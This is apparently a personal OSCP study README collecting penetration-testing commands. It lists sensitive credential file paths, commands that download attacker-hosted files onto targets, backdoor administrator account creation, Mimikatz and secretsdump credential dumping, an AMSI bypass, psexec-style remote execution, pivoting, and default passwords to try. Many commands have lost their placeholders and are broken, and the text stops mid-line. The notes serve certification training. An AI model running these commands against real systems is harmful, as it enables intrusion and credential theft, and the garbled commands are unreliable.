└── README.md /README.md: -------------------------------------------------------------------------------- 1 | # OSCP-Notes 2 | 3 | **Preparing as part of my OSCP Certificate.** 4 | 5 | # General 6 | # OSCP Commands 7 | 8 | > Quick commands and Mods to make Pentesting easy. 9 | 10 | --- 11 | 12 | ## Quick setup 13 | 14 | 15 | #### Exports 16 | 17 | 18 | ``` 19 | export USER="" 20 | export PASSWORD="" 21 | export LHOST="" 22 | export LPORT="" 23 | ``` 24 | 25 | #### Aliases suggestion 26 | 27 | 28 | ``` 29 | alias offsecvpn="sudo openvpn /home/sathvik/OSCP/offsecvpn.ovpn" 30 | alias httpserver="python3 -m http.server 8000" 31 | alias ll="ls -alF" 32 | alias build="mkdir files exploits && touch hashes users passwords" 33 | alias powerenc="python3 /home/sathvik/Tools/power-reverseshell.py" 34 | alias getexploit="searchsploit -m" 35 | alias nmapautomator="bash /opt/nmapautomator.sh" 36 | alias gobuster="gobuster dir -u $URL -w /usr/share/wordlists/dirb/common.txt" 37 | alias nikto="nikto -h $URL" 38 | alias smbclient="smbclient -L //$IP" 39 | alias hydra="hydra -L users.txt -P passwords.txt $IP -t 4 ssh" 40 | alias dirsearch="python3 /opt/dirsearch/dirsearch.py -u $URL -e php,html" 41 | alias nc="nc -lvnp $LPORT" 42 | alias msfconsole="msfconsole -q" 43 | alias curlx="curl -X GET $URL" 44 | alias pyserv="python3 -m http.server $LPORT" 45 | alias sshkeygen="ssh-keygen -t rsa -b 4096" 46 | alias exiftool="exiftool" 47 | alias john="john --wordlist=rockyou.txt" 48 | alias sqlmap="sqlmap -u $URL --batch --random-agent" 49 | alias wget="wget -r -np -R 'index.html*'" 50 | 51 | ``` 52 | 53 | #### Scanning 54 | 55 | 56 | 1. Nmap TCP scan over 65535 ports 57 | 58 | ``` 59 | sudo nmap -T4 -sC -sV -p- $IP --open -oN nmap-tcp.txt -v 60 | ``` 61 | 62 | 2. 
Nmap UDP scan over top ports 63 | 64 | ``` 65 | sudo nmap -sU --top-ports 20 $IP -oN nmap-udp-top.txt --open -v 66 | ``` 67 | 68 | ## Important Locations 69 | 70 | >💡 For Finding all important files in Windows:(CTF Style) 71 | `cd c:\Users` then 72 | `tree /F` 73 | 74 |
75 | Windows 76 | 77 | C:/Users/Administrator/NTUser.dat # Registry settings 78 | C:/Documents and Settings/Administrator/NTUser.dat # Registry settings 79 | C:/apache/logs/access.log # Apache access logs 80 | C:/apache/logs/error.log # Apache error logs 81 | C:/apache/php/php.ini # PHP configuration 82 | C:/boot.ini # Boot configuration 83 | C:/inetpub/wwwroot/global.asa # IIS global script 84 | C:/MySQL/data/hostname.err # MySQL error log 85 | C:/MySQL/data/mysql.err # MySQL error log 86 | C:/MySQL/data/mysql.log # MySQL general log 87 | C:/MySQL/my.cnf # MySQL configuration 88 | C:/MySQL/my.ini # MySQL configuration 89 | C:/php4/php.ini # PHP configuration 90 | C:/php5/php.ini # PHP configuration 91 | C:/php/php.ini # PHP configuration 92 | C:/Program Files/Apache Group/Apache2/conf/httpd.conf # Apache configuration 93 | C:/Program Files/Apache Group/Apache/conf/httpd.conf # Apache configuration 94 | C:/Program Files/Apache Group/Apache/logs/access.log # Apache access logs 95 | C:/Program Files/Apache Group/Apache/logs/error.log # Apache error logs 96 | C:/Program Files/FileZilla Server/FileZilla Server.xml # FTP server config 97 | C:/Program Files/MySQL/data/hostname.err # MySQL error log 98 | C:/Program Files/MySQL/data/mysql-bin.log # MySQL binary log 99 | C:/Program Files/MySQL/data/mysql.err # MySQL error log 100 | C:/Program Files/MySQL/data/mysql.log # MySQL general log 101 | C:/Program Files/MySQL/my.ini # MySQL configuration 102 | C:/Program Files/MySQL/my.cnf # MySQL configuration 103 | C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err # MySQL error log 104 | C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log # MySQL binary log 105 | C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err # MySQL error log 106 | C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log # MySQL general log 107 | C:/Program Files/MySQL/MySQL Server 5.0/my.cnf # MySQL configuration 108 | C:/Program Files/MySQL/MySQL Server 5.0/my.ini # MySQL configuration 109 
| C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf # Apache configuration 110 | C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf # Apache configuration 111 | C:/Program Files (x86)/Apache Group/Apache/conf/access.log # Apache access logs 112 | C:/Program Files (x86)/Apache Group/Apache/conf/error.log # Apache error logs 113 | C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml # FTP server config 114 | C:/Program Files (x86)/xampp/apache/conf/httpd.conf # Apache configuration 115 | C:/WINDOWS/php.ini # PHP configuration 116 | C:/WINDOWS/Repair/SAM # Backup SAM database 117 | C:/Windows/repair/system # Backup system hive 118 | C:/Windows/repair/software # Backup software hive 119 | C:/Windows/repair/security # Backup security hive 120 | C:/WINDOWS/System32/drivers/etc/hosts # Hosts file 121 | C:/Windows/win.ini # Windows initialization 122 | C:/WINNT/php.ini # PHP configuration 123 | C:/WINNT/win.ini # Windows initialization 124 | C:/xampp/apache/bin/php.ini # PHP configuration 125 | C:/xampp/apache/logs/access.log # Apache access logs 126 | C:/xampp/apache/logs/error.log # Apache error logs 127 | C:/Windows/Panther/Unattend/Unattended.xml # Windows setup file 128 | C:/Windows/Panther/Unattended.xml # Windows setup file 129 | C:/Windows/debug/NetSetup.log # Network setup log 130 | C:/Windows/system32/config/AppEvent.Evt # Application event log 131 | C:/Windows/system32/config/SecEvent.Evt # Security event log 132 | C:/Windows/system32/config/default.sav # Registry backup 133 | C:/Windows/system32/config/security.sav # Registry backup 134 | C:/Windows/system32/config/software.sav # Registry backup 135 | C:/Windows/system32/config/system.sav # Registry backup 136 | C:/Windows/system32/config/regback/default # Registry backup 137 | C:/Windows/system32/config/regback/sam # Registry backup 138 | C:/Windows/system32/config/regback/security # Registry backup 139 | C:/Windows/system32/config/regback/system # Registry backup 140 | 
C:/Windows/system32/config/regback/software # Registry backup 141 | C:/Program Files/MySQL/MySQL Server 5.1/my.ini # MySQL configuration 142 | C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml # ASP.NET schema 143 | C:/Windows/System32/inetsrv/config/applicationHost.config # IIS configuration 144 | C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log # IIS log files 145 |
146 | 147 |
148 | Linux 149 | 150 | /etc/passwd # User accounts 151 | /etc/shadow # Password hashes 152 | /etc/aliases # Email aliases 153 | /etc/anacrontab # Cron jobs 154 | /etc/apache2/apache2.conf # Apache configuration 155 | /etc/apache2/httpd.conf # Apache configuration 156 | /etc/apache2/sites-enabled/000-default.conf # Apache virtual host 157 | /etc/at.allow # Allowed at users 158 | /etc/at.deny # Denied at users 159 | /etc/bashrc # Bash shell initialization 160 | /etc/bootptab # BOOTP server configuration 161 | /etc/chrootUsers # Chroot users 162 | /etc/chttp.conf # CHTTP server configuration 163 | /etc/cron.allow # Allowed cron users 164 | /etc/cron.deny # Denied cron users 165 | /etc/crontab # Cron jobs 166 | /etc/cups/cupsd.conf # CUPS configuration 167 | /etc/exports # NFS shares 168 | /etc/fstab # Filesystems mount 169 | /etc/ftpaccess # FTP server access 170 | /etc/ftpchroot # FTP chroot users 171 | /etc/ftphosts # FTP host access 172 | /etc/groups # Group accounts 173 | /etc/grub.conf # Bootloader configuration 174 | /etc/hosts # Hostname to IP 175 | /etc/hosts.allow # Allowed hosts 176 | /etc/hosts.deny # Denied hosts 177 | /etc/httpd/access.conf # Apache access config 178 | /etc/httpd/conf/httpd.conf # Apache configuration 179 | /etc/httpd/httpd.conf # Apache configuration 180 | /etc/httpd/logs/access_log # Apache access logs 181 | /etc/httpd/logs/access.log # Apache access logs 182 | /etc/httpd/logs/error_log # Apache error logs 183 | /etc/httpd/logs/error.log # Apache error logs 184 | /etc/httpd/php.ini # PHP configuration 185 | /etc/httpd/srm.conf # Apache srm config 186 | /etc/inetd.conf # Inetd service configuration 187 | /etc/inittab # System initialization 188 | /etc/issue # Pre-login message 189 | /etc/knockd.conf # Knockd configuration 190 | /etc/lighttpd.conf # Lighttpd configuration 191 | /etc/lilo.conf # LILO bootloader config 192 | /etc/logrotate.d/ftp # Logrotate FTP logs 193 | /etc/logrotate.d/proftpd # Logrotate ProFTPD logs 194 | 
/etc/logrotate.d/vsftpd.log # Logrotate vsftpd logs 195 | /etc/lsb-release # Distro info 196 | /etc/motd # Message of the day 197 | /etc/modules.conf # Kernel modules 198 | /etc/motd # Message of the day 199 | /etc/mtab # Mounted filesystems 200 | /etc/my.cnf # MySQL configuration 201 | /etc/my.conf # MySQL configuration 202 | /etc/mysql/my.cnf # MySQL configuration 203 | /etc/network/interfaces # Network configuration 204 | /etc/networks # Network names 205 | /etc/npasswd # Password file 206 | /etc/php4.4/fcgi/php.ini # PHP configuration 207 | /etc/php4/apache2/php.ini # PHP configuration 208 | /etc/php4/apache/php.ini # PHP configuration 209 | /etc/php4/cgi/php.ini # PHP configuration 210 | /etc/php5/apache2/php.ini # PHP configuration 211 | /etc/php5/apache/php.ini # PHP configuration 212 | /etc/php/apache2/php.ini # PHP configuration 213 | /etc/php/apache/php.ini # PHP configuration 214 | /etc/php/cgi/php.ini # PHP configuration 215 | /etc/php.ini # PHP configuration 216 | /etc/php/php4/php.ini # PHP configuration 217 | /etc/php/php.ini # PHP configuration 218 | /etc/printcap # Printer capabilities 219 | /etc/profile # System-wide shell profile 220 | /etc/proftp.conf # ProFTPd configuration 221 | /etc/proftpd/proftpd.conf # ProFTPd configuration 222 | /etc/pure-ftpd.conf # Pure-FTPD configuration 223 | /etc/pureftpd.passwd # Pure-FTPD password file 224 | /etc/pureftpd.pdb # Pure-FTPD user database 225 | /etc/pure-ftpd/pure-ftpd.conf # Pure-FTPD configuration 226 | /etc/pure-ftpd/pure-ftpd.pdb # Pure-FTPD database 227 | /etc/pure-ftpd/putreftpd.pdb # Pure-FTPD database 228 | /etc/redhat-release # RedHat version info 229 | /etc/resolv.conf # DNS servers 230 | /etc/samba/smb.conf # Samba configuration 231 | /etc/snmpd.conf # SNMP daemon config 232 | /etc/ssh/ssh_config # SSH client config 233 | /etc/ssh/sshd_config # SSH server config 234 | /etc/ssh/ssh_host_dsa_key # SSH host key 235 | /etc/ssh/ssh_host_dsa_key.pub # SSH host key 236 | /etc/ssh/ssh_host_key # SSH 
host key 237 | /etc/ssh/ssh_host_key.pub # SSH host key 238 | /etc/sysconfig/network # Network settings 239 | /etc/syslog.conf # Syslog configuration 240 | /etc/termcap # Terminal capabilities 241 | /etc/vhcs2/proftpd/proftpd.conf # VHCS2 ProFTPd config 242 | /etc/vsftpd.chroot_list # VsFTPd chroot list 243 | /etc/vsftpd.conf # VsFTPd configuration 244 | /etc/vsftpd/vsftpd.conf # VsFTPd configuration 245 | /etc/wu-ftpd/ftpaccess # WuFTP access control 246 | /etc/wu-ftpd/ftphosts # WuFTP hosts 247 | /etc/wu-ftpd/ftpusers # WuFTP users 248 | /logs/pure-ftpd.log # Pure-FTPD logs 249 | /logs/security_debug_log # Security logs 250 | /logs/security_log # Security logs 251 | /opt/lampp/etc/httpd.conf # XAMPP Apache config 252 | /opt/xampp/etc/php.ini # XAMPP PHP config 253 | /proc/cmdline # Boot command line 254 | /proc/cpuinfo # CPU information 255 | /proc/filesystems # Filesystems supported 256 | /proc/interrupts # Interrupts info 257 | /proc/ioports # I/O port info 258 | /proc/meminfo # Memory info 259 | /proc/modules # Loaded kernel modules 260 | /proc/mounts # Mounted filesystems 261 | /proc/net/arp # ARP table 262 | /proc/net/tcp # TCP connections 263 | /proc/net/udp # UDP connections 264 | /proc//cmdline # Process command line 265 | /proc//maps # Process memory maps 266 | /proc/sched_debug # Scheduler debug info 267 | /proc/self/cwd/app.py # Current working directory app 268 | /proc/self/environ # Process environment 269 | /proc/self/net/arp # ARP table 270 | /proc/stat # System statistics 271 | /proc/swaps # Swap information 272 | /proc/version # Kernel version 273 | /root/anaconda-ks.cfg # Kickstart configuration 274 | /usr/etc/pure-ftpd.conf # Pure-FTPD configuration 275 | /usr/lib/php.ini # PHP configuration 276 | /usr/lib/php/php.ini # PHP configuration 277 | /usr/local/apache/conf/modsec.conf # ModSecurity config 278 | /usr/local/apache/conf/php.ini # PHP configuration 279 | /usr/local/apache/log # Apache logs 280 | /usr/local/apache/logs # Apache logs 281 | 
/usr/local/apache/logs/access_log # Apache access logs 282 | /usr/local/apache/logs/access.log # Apache access logs 283 | /usr/local/apache/audit_log # Apache audit logs 284 | /usr/local/apache/error_log # Apache error logs 285 | /usr/local/apache/error.log # Apache error logs 286 | /usr/local/cpanel/logs # cPanel logs 287 | /usr/local/cpanel/logs/access_log # cPanel access logs 288 | /usr/local/cpanel/logs/error_log # cPanel error logs 289 | /usr/local/cpanel/logs/license_log # cPanel license logs 290 | /usr/local/cpanel/logs/login_log # cPanel login logs 291 | /usr/local/cpanel/logs/stats_log # cPanel stats logs 292 | /usr/local/etc/httpd/logs/access_log # HTTPD access logs 293 | /usr/local/etc/httpd/logs/error_log # HTTPD error logs 294 | /usr/local/etc/php.ini # PHP configuration 295 | /usr/local/etc/pure-ftpd.conf # Pure-FTPD configuration 296 | /usr/local/etc/pureftpd.pdb # Pure-FTPD database 297 | /usr/local/lib/php.ini # PHP configuration 298 | /usr/local/php4/httpd.conf # PHP4 HTTPD config 299 | /usr/local/php4/httpd.conf.php # PHP4 HTTPD PHP config 300 | /usr/local/php4/lib/php.ini # PHP4 configuration 301 | /usr/local/php5/httpd.conf # PHP5 HTTPD config 302 | /usr/local/php5/httpd.conf.php # PHP5 HTTPD PHP config 303 | /usr/local/php5/lib/php.ini # PHP5 configuration 304 | /usr/local/php/httpd.conf # PHP HTTPD config 305 | /usr/local/php/httpd.conf.ini # PHP HTTPD ini config 306 | /usr/local/php/lib/php.ini # PHP configuration 307 | /usr/local/pureftpd/etc/pure-ftpd.conf # Pure-FTPD configuration 308 | /usr/local/pureftpd/etc/pureftpd.pdn # Pure-FTPD database 309 | /usr/local/pureftpd/sbin/pure-config.pl # Pure-FTPD script 310 | /usr/local/www/logs/httpd_log # HTTPD logs 311 | /usr/local/Zend/etc/php.ini # Zend PHP configuration 312 | /usr/sbin/pure-config.pl # Pure-FTPD script 313 | /var/adm/log/xferlog # Transfer logs 314 | /var/apache2/config.inc # Apache2 configuration 315 | /var/apache/logs/access_log # Apache access logs 316 | 
/var/apache/logs/error_log # Apache error logs 317 | /var/cpanel/cpanel.config # cPanel configuration 318 | /var/lib/mysql/my.cnf # MySQL configuration 319 | /var/lib/mysql/mysql/user.MYD # MySQL user data 320 | /var/local/www/conf/php.ini # PHP configuration 321 | /var/log/apache2/access_log # Apache access logs 322 | /var/log/apache2/access.log # Apache access logs 323 | /var/log/apache2/error_log # Apache error logs 324 | /var/log/apache2/error.log # Apache error logs 325 | /var/log/apache/access_log # Apache access logs 326 | /var/log/apache/access.log # Apache access logs 327 | /var/log/apache/error_log # Apache error logs 328 | /var/log/apache/error.log # Apache error logs 329 | /var/log/apache-ssl/access.log # SSL access logs 330 | /var/log/apache-ssl/error.log # SSL error logs 331 | /var/log/auth.log # Authentication logs 332 | /var/log/boot # Boot logs 333 | /var/htmp # Temporary files 334 | /var/log/chttp.log # CHTTP logs 335 | /var/log/cups/error.log # CUPS error logs 336 | /var/log/daemon.log # Daemon logs 337 | /var/log/debug # Debug logs 338 | /var/log/dmesg # Boot messages 339 | /var/log/dpkg.log # Package manager logs 340 | /var/log/exim_mainlog # Exim main logs 341 | /var/log/exim/mainlog # Exim main logs 342 | /var/log/exim_paniclog # Exim panic logs 343 | /var/log/exim.paniclog # Exim panic logs 344 | /var/log/exim_rejectlog # Exim reject logs 345 | /var/log/exim/rejectlog # Exim reject logs 346 | /var/log/faillog # Failed login attempts 347 | /var/log/ftplog # FTP logs 348 | /var/log/ftp-proxy # FTP proxy logs 349 | /var/log/ftp-proxy/ftp-proxy.log # FTP proxy logs 350 | /var/log/httpd-access.log # HTTPD access logs 351 | /var/log/httpd/access_log # HTTPD access logs 352 | /var/log/httpd/access.log # HTTPD access logs 353 | /var/log/httpd/error_log # HTTPD error logs 354 | /var/log/httpd/error.log # HTTPD error logs 355 | /var/log/httpsd/ssl.access_log # SSL access logs 356 | /var/log/httpsd/ssl_log # SSL logs 357 | /var/log/kern.log # Kernel 
logs 358 | /var/log/lastlog # Last login logs 359 | /var/log/lighttpd/access.log # Lighttpd access logs 360 | /var/log/lighttpd/error.log # Lighttpd error logs 361 | /var/log/lighttpd/lighttpd.access.log # Lighttpd access logs 362 | /var/log/lighttpd/lighttpd.error.log # Lighttpd error logs 363 | /var/log/mail.info # Mail information 364 | /var/log/mail.log # Mail logs 365 | /var/log/maillog # Mail logs 366 | /var/log/mail.warn # Mail warnings 367 | /var/log/message # System messages 368 | /var/log/messages # System messages 369 | /var/log/mysqlderror.log # MySQL error log 370 | /var/log/mysql.log # MySQL logs 371 | /var/log/mysql/mysql-bin.log # MySQL binary log 372 | /var/log/mysql/mysql.log # MySQL logs 373 | /var/log/mysql/mysql-slow.log # MySQL slow query log 374 | /var/log/proftpd # ProFTPd logs 375 | /var/log/pureftpd.log # Pure-FTPD logs 376 | /var/log/pure-ftpd/pure-ftpd.log # Pure-FTPD logs 377 | /var/log/secure # Security logs 378 | /var/log/vsftpd.log # VsFTPd logs 379 | /var/log/wtmp # Login records 380 | /var/log/xferlog # Transfer logs 381 | /var/log/yum.log # Yum package manager logs 382 | /var/mysql.log # MySQL logs 383 | /var/run/utmp # Current logins 384 | /var/spool/cron/crontabs/root # Root crontab 385 | /var/webmin/miniserv.log # Webmin logs 386 | /var/www/html/__init__.py # Python init file 387 | /var/www/html/db_connect.php # PHP database connection 388 | /var/www/html/utils.php # PHP utility file 389 | /var/www/log/access_log # Web access logs 390 | /var/www/log/error_log # Web error logs 391 | /var/www/logs/access_log # Web access logs 392 | /var/www/logs/error_log # Web error logs 393 | /var/www/logs/access.log # Web access logs 394 | /var/www/logs/error.log # Web error logs 395 | ~/.atfp_history # ATFP history 396 | ~/.bash_history # Bash shell history 397 | ~/.bash_logout # Bash logout file 398 | ~/.bash_profile # Bash profile 399 | ~/.bashrc # Bash shell initialization 400 | ~/.gtkrc # GTK settings 401 | ~/.login # Shell login script 
402 | ~/.logout # Shell logout script 403 | ~/.mysql_history # MySQL history 404 | ~/.nano_history # Nano editor history 405 | ~/.php_history # PHP shell history 406 | ~/.profile # User profile script 407 | ~/.ssh/authorized_keys # SSH authorized keys 408 | ~/.ssh/id_dsa # DSA SSH private key 409 | ~/.ssh/id_dsa.pub # DSA SSH public key 410 | ~/.ssh/id_rsa # RSA SSH private key 411 | ~/.ssh/id_ecdsa # ECDSA SSH private key 412 | ~/.ssh/id_rsa.pub # RSA SSH public key 413 | ~/.ssh/identity # SSH identity key 414 | ~/.ssh/identity.pub # SSH public key 415 | ~/.viminfo # Vim editor history 416 | ~/.wm_style # Window manager style 417 | ~/.Xdefaults # X Window settings 418 | ~/.xinitrc # X Window init script 419 | ~/.Xresources # X Window resources 420 | ~/.xsession # X Window session script 421 |
422 | 423 | **Discovering KDBX files** 424 | 1. In Windows 425 | ```powershell 426 | Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue 427 | ``` 428 | 2. In Linux 429 | ```bash 430 | find / -name *.kdbx 2>/dev/null 431 | ``` 432 | 433 | ### GitHub recon 434 | 435 | - You need to find traces of the `.git` directory on the target machine. 436 | - Then navigate to the directory where it is located, a potential repository. 437 | - Commands 438 | 439 | ```bash 440 | # Log information of the current repository. 441 | git log 442 | 443 | # This displays the log of what happened, such as the commit history, which is very useful. 444 | git show 445 | 446 | # This shows the commit information and the newly added content. 447 | ``` 448 | 449 | - If you identify `.git` exposed on the website, use https://github.com/arthaud/git-dumper; it downloads all the files and saves them locally. Then run the same commands as above and escalate. 450 | - Some useful GitHub dorks: [https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets](https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets) → this might not be relevant to the exam environment. 451 | 452 | ## Connecting to RDP 453 | 454 | ```bash 455 | xfreerdp /u:uname /p:'pass' /v:IP 456 | xfreerdp /d:domain.com /u:uname /p:'pass' /v:IP 457 | xfreerdp /u:uname /p:'pass' /v:IP +clipboard #try this option if normal login doesn't work 458 | ``` 459 | 460 | ## Adding SSH Public key 461 | 462 | - This can be used to get an SSH session on a Linux-based target machine. 463 | 464 | ```bash 465 | ssh-keygen -t rsa -b 4096 #give any password 466 | 467 | #This creates both id_rsa and id_rsa.pub in the ~/.ssh directory 468 | #Copy the content of "id_rsa.pub" and create a ".ssh" directory in /home of the target machine.
469 | chmod 700 ~/.ssh 470 | nano ~/.ssh/authorized_keys #enter the copied content here 471 | chmod 600 ~/.ssh/authorized_keys 472 | 473 | #On Attacker machine 474 | ssh username@target_ip #enter password if you gave any 475 | ``` 476 | 477 | ## File Transfers 478 | 479 | - Netcat 480 | 481 | ```bash 482 | #Attacker 483 | nc 1234 < nmap 484 | 485 | #Target 486 | nc -lvp 1234 > nmap 487 | ``` 488 | 489 | - Downloading on Windows 490 | 491 | ```powershell 492 | powershell -command Invoke-WebRequest -Uri http://:/ -Outfile C:\\temp\\ 493 | iwr -uri http://lhost/file -Outfile file 494 | certutil -urlcache -split -f "http:///" 495 | copy \\kali\share\file . 496 | ``` 497 | 498 | - Downloading on Linux 499 | 500 | ```powershell 501 | wget http://lhost/file 502 | curl http:/// > 503 | ``` 504 | 505 | ### Windows to Kali 506 | 507 | ```powershell 508 | kali> impacket-smbserver -smb2support . 509 | win> copy file \\KaliIP\sharename 510 | ``` 511 | 512 | ## Adding Users 513 | 514 | ### Windows 515 | 516 | ```powershell 517 | net user hacker hacker123 /add 518 | net localgroup Administrators hacker /add 519 | net localgroup "Remote Desktop Users" hacker /ADD 520 | ``` 521 | 522 | ### Linux 523 | 524 | ```powershell 525 | adduser #Interactive 526 | useradd 527 | 528 | useradd -u -g #UID can be something new than existing, this command is to add a user to a specific group 529 | ``` 530 | 531 | ## Password-Hash Cracking 532 | 533 | *Hash Analyzer*: [https://www.tunnelsup.com/hash-analyzer/](https://www.tunnelsup.com/hash-analyzer/)
534 | ## Password file seen in the OffSec Discord: 500-worst-passwords.txt 535 | ### Hash Identifier 536 | - Identify the hash types using these tools 537 | ```powershell 538 | hashid 539 | name-that-hash -f 540 | ``` 541 | ### fcrackzip 542 | 543 | ```powershell 544 | fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt .zip #Cracking zip files 545 | ``` 546 | 547 | ### John 548 | 549 | > [https://github.com/openwall/john/tree/bleeding-jumbo/run](https://github.com/openwall/john/tree/bleeding-jumbo/run) 550 | > 551 | - If there’s an encrypted file, try to convert it into a John hash and crack it. 552 | 553 | ```powershell 554 | ssh2john.py id_rsa > hash 555 | #Convert the obtained hash to John format (see the link above) 556 | john hashfile --wordlist=rockyou.txt 557 | ``` 558 | ### keepass2John 559 | During initial enumeration of the target with `smbclient -L //target` (or `smbclient -L ////target`), a Database.kdbx file was found in a user directory. 560 | ```powershell 561 | keepass2john Database.kdbx > keepass.hash 562 | john keepass.hash 563 | or 564 | hashcat --help | grep "KeePass" 565 | hashcat -m 13400 keepass.hash /home/kali/HTB/OSCP/rockyou.txt 566 | ``` 567 | 568 | 569 | ### Hashcat 570 | 571 | > [https://hashcat.net/wiki/doku.php?id=example_hashes](https://hashcat.net/wiki/doku.php?id=example_hashes) 572 | > 573 | 574 | ```powershell 575 | #Obtain the Hash module number 576 | hashcat -m hash wordlists.txt --force 577 | ``` 578 | 579 | ## Pivoting through SSH 580 | 581 | ```bash 582 | ssh adminuser@10.10.155.5 -i id_rsa -D 9050 #TOR port 583 | 584 | #Change the info in /etc/proxychains4.conf also enable "Quiet Mode" 585 | 586 | proxychains4 crackmapexec smb 10.10.10.0/24 #Example 587 | ``` 588 | 589 | ## Dealing with Passwords 590 | 591 | - When there’s scope for bruteforce or hash-cracking, try the following: 592 | - Have valid usernames first 593 | - Don't forget to try `admin:admin` 594 | - Try `username:username` as the first credential 595 | - If it’s related to a
service, try default passwords. 596 | - Service name as the username as well as the same name for password. 597 | - Use Rockyou.txt 598 | - Some default passwords to always try out! 599 | 600 | ```jsx 601 | password 602 | password1 603 | Password1 604 | Password@123 605 | password@123 606 | admin 607 | administrator 608 | admin@123 609 | 610 | ``` 611 | 612 | ## Impacket 613 | 614 | ```bash 615 | smbclient.py [domain]/[user]:[password/password hash]@[Target IP Address] #we connect to the server rather than a share 616 | 617 | lookupsid.py [domain]/[user]:[password/password hash]@[Target IP Address] #User enumeration on target 618 | 619 | services.py [domain]/[user]:[Password/Password Hash]@[Target IP Address] [Action] #service enumeration 620 | 621 | secretsdump.py [domain]/[user]:[password/password hash]@[Target IP Address] #Dumping hashes on target 622 | 623 | GetUserSPNs.py [domain]/[user]:[password/password hash]@[Target IP Address] -dc-ip -request #Kerberoasting, and request option dumps TGS 624 | 625 | GetNPUsers.py test.local/ -dc-ip -usersfile usernames.txt -format hashcat -outputfile hashes.txt #Asreproasting, need to provide usernames list 626 | 627 | ##RCE 628 | psexec.py test.local/john:password123@10.10.10.1 629 | psexec.py -hashes lmhash:nthash test.local/john@10.10.10.1 630 | 631 | wmiexec.py test.local/john:password123@10.10.10.1 632 | wmiexec.py -hashes lmhash:nthash test.local/john@10.10.10.1 633 | 634 | smbexec.py test.local/john:password123@10.10.10.1 635 | smbexec.py -hashes lmhash:nthash test.local/john@10.10.10.1 636 | 637 | atexec.py test.local/john:password123@10.10.10.1 638 | atexec.py -hashes lmhash:nthash test.local/john@10.10.10.1 639 | 640 | ``` 641 | 642 | ## Evil-Winrm 643 | 644 | ```bash 645 | ##winrm service discovery 646 | nmap -p5985,5986 647 | 5985 - plaintext protocol 648 | 5986 - encrypted 649 | 650 | ##Login with password 651 | evil-winrm -i -u user -p pass 652 | evil-winrm -i -u user -p pass -S #if 5986 port is open 653 | 
654 | ##Login with Hash 655 | evil-winrm -i -u user -H ntlmhash 656 | 657 | ##Login with key 658 | evil-winrm -i -c certificate.pem -k priv-key.pem -S #-c for public key and -k for private key 659 | 660 | ##Logs 661 | evil-winrm -i -u user -p pass -l 662 | 663 | ##File upload and download 664 | upload 665 | download #not required to provide path all time 666 | 667 | ##Loading files direclty from Kali location 668 | evil-winrm -i -u user -p pass -s /opt/privsc/powershell #Location can be different 669 | Bypass-4MSI 670 | Invoke-Mimikatz.ps1 671 | Invoke-Mimikatz 672 | 673 | ##evil-winrm commands 674 | menu # to view commands 675 | #There are several commands to run 676 | #This is an example for running a binary 677 | evil-winrm -i -u user -p pass -e /opt/privsc 678 | Bypass-4MSI 679 | menu 680 | Invoke-Binary /opt/privsc/winPEASx64.exe 681 | ``` 682 | 683 | ## Mimikatz 684 | 685 | ```powershell 686 | privilege::debug 687 | 688 | token::elevate 689 | 690 | sekurlsa::logonpasswords #hashes and plaintext passwords 691 | lsadump::sam 692 | lsadump::sam SystemBkup.hiv SamBkup.hiv 693 | lsadump::dcsync /user:krbtgt 694 | lsadump::lsa /patch #both these dump SAM 695 | 696 | #OneLiner 697 | .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" 698 | 699 | ``` 700 | 701 | ## Ligolo-ng 702 | 703 | ```powershell 704 | #Creating interface and starting it. 
705 | sudo ip tuntap add user $(whoami) mode tun ligolo 706 | sudo ip link set ligolo up 707 | 708 | #Kali machine - Attacker machine 709 | ./proxy -laddr 0.0.0.0:9001 -selfcert 710 | 711 | #windows or linux machine - compromised machine 712 | agent.exe -connect :9001 -ignore-cert 713 | 714 | #In Ligolo-ng console 715 | session #select host 716 | ifconfig #Note down the internal network's subnet 717 | start #after adding the relevant subnet to the ligolo interface 718 | 719 | #Adding subnet to ligolo interface - Kali linux 720 | sudo ip r add dev ligolo 721 | 722 | ``` 723 | 724 | --- 725 | 726 | # Recon and Enumeration 727 | 728 | - OSINT or Passive Recon 729 | 730 | 734 | 735 | - whois: `whois ` or `whois -h ` 736 | - Google dorking: 737 | - site 738 | - filetype 739 | - intitle 740 | - GHDB - Google Hacking Database 741 | - OS and Service Information using [searchdns.netcraft.com](http://searchdns.netcraft.com) 742 | - GitHub dorking: 743 | - filename 744 | - user 745 | - A tool called Gitleaks for automated enumeration 746 | - Shodan dorks: 747 | - hostname 748 | - port 749 | - Then gather info by going through the options 750 | - Scanning security headers and SSL/TLS using [https://securityheaders.com/](https://securityheaders.com/) 751 | 752 | 753 | ## Port Scanning 754 | 755 | ```powershell 756 | #use the -Pn option if you're getting nothing in the scan 757 | nmap -sC -sV -v #Basic scan 758 | nmap -T4 -A -p- -v #complete scan 759 | sudo nmap -sV -p 443 --script "vuln" 192.168.50.124 #running vuln category scripts 760 | 761 | #NSE 762 | updatedb 763 | locate .nse | grep 764 | sudo nmap --script="name" #here we can specify other options like specific ports...etc 765 | 766 | Test-NetConnection -Port #powershell utility 767 | 768 | 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("IP", $_)) "TCP port $_ is open"} 2>$null #automating port scan of first 1024 ports in powershell 769 | ``` 770 | 771 | ## FTP enumeration 772 | 773 | ```powershell 774 | ftp 775 | #login if
